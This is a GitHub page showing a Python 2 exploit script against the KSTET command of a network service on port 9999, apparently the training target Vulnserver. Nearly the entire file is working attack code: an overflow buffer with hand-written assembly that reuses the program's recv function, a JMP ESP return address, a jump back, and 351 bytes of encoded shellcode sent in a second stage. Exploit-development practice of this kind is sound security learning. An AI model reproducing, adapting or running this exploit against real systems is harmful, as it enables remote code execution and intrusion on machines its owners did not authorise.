-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathKSTET_EIP_RECV.py
95 lines (70 loc) · 3.28 KB
/
KSTET_EIP_RECV.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/python
import socket
from time import sleep
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.101.158',9999))
# PAYLOAD LENGHT IS : 4010 with 4000 of A
# Location of recv ? : CALL 0040252C
buf = 'KSTET /.:/'
# [*] Exact match at offset 66
buf += "A"*2
buf += "\x54" # PUSH ESP
buf += "\x59" # POP ECX
buf += "\x66\x81\xC1\xCC\x05" # ADD CX,5CC
buf += "\x83\xEC\x50" # SUB ESP,50 VERY IMPORTANT TO PREVENT EIP OVERWRITE !
buf += "\x33\xD2" # XOR EDX,EDX
buf += "\x52" # PUSH EDX
buf += "\x80\xC6\x02" # ADD DH,2
buf += "\x52" # PUSH EDX
buf += "\x54" # PUSH ESP
buf += "\x5A" # POP EDX
# buf += "\x80\xEA\x14" # SUB DL,14 Replaced by ADD EDX, 50 ?? Don'k ask me why some magic KungFu
buf += "\x83\xC2\x50" # ADD EDX, 50
buf += "\x52" # PUSH EDX
buf += "\xFF\x31" # PUSH DWORD PTR DS:[ECX]
buf += "\xB8\x11\x2C\x25\x40" # MOV EAX,40252C11
buf += "\xC1\xE8\x08" # SHR EAX,8
buf += "\xFF\xD0" # CALL EAX
buf += "A"*(66-2-35)
# buf += "B"*4
# 625011AF JMP ESP
buf += "\xaf\x11\x50\x62"
buf += "\xEB\xBA" # Jump Back
buf += "C"*(100-2)
shellcode = "\x90"*20
# Payload size: 351 bytes
shellcode += "\xda\xd2\xd9\x74\x24\xf4\x5f\x2b\xc9\xbb\x48\x9b\xb7"
shellcode += "\xf4\xb1\x52\x83\xef\xfc\x31\x5f\x13\x03\x17\x88\x55"
shellcode += "\x01\x5b\x46\x1b\xea\xa3\x97\x7c\x62\x46\xa6\xbc\x10"
shellcode += "\x03\x99\x0c\x52\x41\x16\xe6\x36\x71\xad\x8a\x9e\x76"
shellcode += "\x06\x20\xf9\xb9\x97\x19\x39\xd8\x1b\x60\x6e\x3a\x25"
shellcode += "\xab\x63\x3b\x62\xd6\x8e\x69\x3b\x9c\x3d\x9d\x48\xe8"
shellcode += "\xfd\x16\x02\xfc\x85\xcb\xd3\xff\xa4\x5a\x6f\xa6\x66"
shellcode += "\x5d\xbc\xd2\x2e\x45\xa1\xdf\xf9\xfe\x11\xab\xfb\xd6"
shellcode += "\x6b\x54\x57\x17\x44\xa7\xa9\x50\x63\x58\xdc\xa8\x97"
shellcode += "\xe5\xe7\x6f\xe5\x31\x6d\x6b\x4d\xb1\xd5\x57\x6f\x16"
shellcode += "\x83\x1c\x63\xd3\xc7\x7a\x60\xe2\x04\xf1\x9c\x6f\xab"
shellcode += "\xd5\x14\x2b\x88\xf1\x7d\xef\xb1\xa0\xdb\x5e\xcd\xb2"
shellcode += "\x83\x3f\x6b\xb9\x2e\x2b\x06\xe0\x26\x98\x2b\x1a\xb7"
shellcode += "\xb6\x3c\x69\x85\x19\x97\xe5\xa5\xd2\x31\xf2\xca\xc8"
shellcode += "\x86\x6c\x35\xf3\xf6\xa5\xf2\xa7\xa6\xdd\xd3\xc7\x2c"
shellcode += "\x1d\xdb\x1d\xe2\x4d\x73\xce\x43\x3d\x33\xbe\x2b\x57"
shellcode += "\xbc\xe1\x4c\x58\x16\x8a\xe7\xa3\xf1\x75\x5f\xcf\x33"
shellcode += "\x1e\xa2\x0f\x35\x65\x2b\xe9\x5f\x89\x7a\xa2\xf7\x30"
shellcode += "\x27\x38\x69\xbc\xfd\x45\xa9\x36\xf2\xba\x64\xbf\x7f"
shellcode += "\xa8\x11\x4f\xca\x92\xb4\x50\xe0\xba\x5b\xc2\x6f\x3a"
shellcode += "\x15\xff\x27\x6d\x72\x31\x3e\xfb\x6e\x68\xe8\x19\x73"
shellcode += "\xec\xd3\x99\xa8\xcd\xda\x20\x3c\x69\xf9\x32\xf8\x72"
shellcode += "\x45\x66\x54\x25\x13\xd0\x12\x9f\xd5\x8a\xcc\x4c\xbc"
shellcode += "\x5a\x88\xbe\x7f\x1c\x95\xea\x09\xc0\x24\x43\x4c\xff"
shellcode += "\x89\x03\x58\x78\xf4\xb3\xa7\x53\xbc\x9e\x9d\xb9\x9e"
shellcode += "\xb6\xbb\xa8\x9c\xda\x3b\x07\xe2\xe2\xbf\xad\x9b\x10"
shellcode += "\xdf\xc4\x9e\x5d\x67\x35\xd3\xce\x02\x39\x40\xee\x06"
shellcode += "\x90"*(512- 351-20)
print "Fuzzing TRUN with %s bytes" % len(buf)
print s.recv(1024)
s.send(buf + '\r\n')
sleep(2)
s.send(shellcode)
#print s.recv(1024)
s.close()